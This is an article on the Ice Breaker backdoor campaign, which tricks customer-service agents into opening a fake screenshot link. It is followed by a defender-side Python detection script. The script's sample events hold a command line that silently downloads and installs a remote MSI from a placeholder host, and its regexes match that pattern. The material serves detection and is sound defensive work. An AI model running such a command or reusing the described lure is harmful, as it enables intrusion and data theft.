Experts Warn of ‘Ice Breaker’ Cyber attacks

On February 1, 2022, Israeli cyber security company Security Joes published an article about the Ice Breaker malware. According to the article, researchers observed hackers targeting online gaming and gambling companies with a backdoor named Ice Breaker. The only publicly available evidence of the Ice Breaker threat discovered so far was a tweet from MalwareHunterTeam in October, which is shown below.

The Ice breaker attack

In its article, Security Joes describes the threat actor behind the malware, Ice Breaker APT, as cunning and wise. Ice Breaker is a human-operated attack that abuses customer service channels to plant a backdoor on the platform. For the attack to succeed, the operator must convince the target to open an LNK or ZIP file, which in most cases is hosted on a bogus website imitating a reliable service. The file contains a command to download an MSI payload from the attacker’s server, install it without user interaction, and execute it without a user interface. The downloaded malware is “a highly complex compiled JavaScript file”.

Once the Ice Breaker backdoor has been installed on the target’s device, the attacker can open remote shell sessions, take screenshots of the victim’s computer, steal cookies, credentials and arbitrary files, extend the malware with plug-ins, and run custom VBS scripts on the compromised machine.

Indicators of the attack

In this kind of attack, the visitor does not have an account on the targeted site, yet claims to have trouble logging in. Another indicator is that the attacker sends a link to download a screenshot of the problem from an external website rather than simply attaching an image. The group behind these attacks remains unknown.

The conversations between Ice Breaker and support agents show that Ice Breaker is not a native English speaker and is purposefully requesting to talk with Spanish-speaking agents.

Delivering the backdoor

To deploy the backdoor, the threat actor contacts the target company’s customer service pretending to be a user who is having trouble signing in or enrolling with the online service.

The attackers persuade the customer service representative to download a picture that supposedly explains the issue better than they can in words. Researchers report that the image is typically hosted on a bogus website impersonating a reputable provider, although they have also seen it delivered via Dropbox storage.
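As an added, defender-side example (not code from the Security Joes report): a small Python triage over constructed process-creation events that flags the behaviour described for the LNK stage, msiexec fetching a package from a URL and installing it with the UI suppressed. The msiexec switch names are real; the hostnames, paths and the assumption that the command is launched through a shell or script host are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Real msiexec switches: /i or /package installs a package; /quiet, /qn and /q suppress the UI.
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
INSTALL_RE = re.compile(r"(?:^|\s)/(?:package|i)\b", re.IGNORECASE)
SILENT_RE = re.compile(r"(?:^|\s)/(?:quiet|qn|q)\b", re.IGNORECASE)
# Parents that fit a command embedded in an LNK rather than a user double-clicking an installer (assumption).
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

@dataclass
class ProcEvent:
    """Minimal process-creation record with Sysmon Event ID 1 style fields."""
    image: str          # full path of the new process
    command_line: str
    parent_image: str

def msiexec_findings(ev: ProcEvent) -> List[str]:
    """Reasons this event matches the remote, silent MSI install pattern; an empty list means no match."""
    if not ev.image.lower().endswith("\\msiexec.exe"):
        return []
    cl = ev.command_line
    # Core condition: msiexec told to install a package whose source is a URL.
    if not (INSTALL_RE.search(cl) and URL_RE.search(cl)):
        return []
    reasons = ["msiexec installing a package fetched from a URL"]
    if SILENT_RE.search(cl):
        reasons.append("UI suppressed (silent install)")
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent in SCRIPT_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons

def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event an analyst should look at."""
    return [(i, r) for i, ev in enumerate(events) if (r := msiexec_findings(ev))]

# Constructed sample events; hostnames and paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://cdn.example-invalid.test/screenshot.msi /qn", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\agent\Downloads\notepad-setup.msi", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /x {PLACEHOLDER-PRODUCT-CODE} /qn", r"C:\Windows\System32\services.exe"),
]
```

Running `triage(SAMPLE_EVENTS)` flags only the first event; a local interactive install and a silent uninstall are left alone, which is the point of requiring the URL condition before the confidence boosters count.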
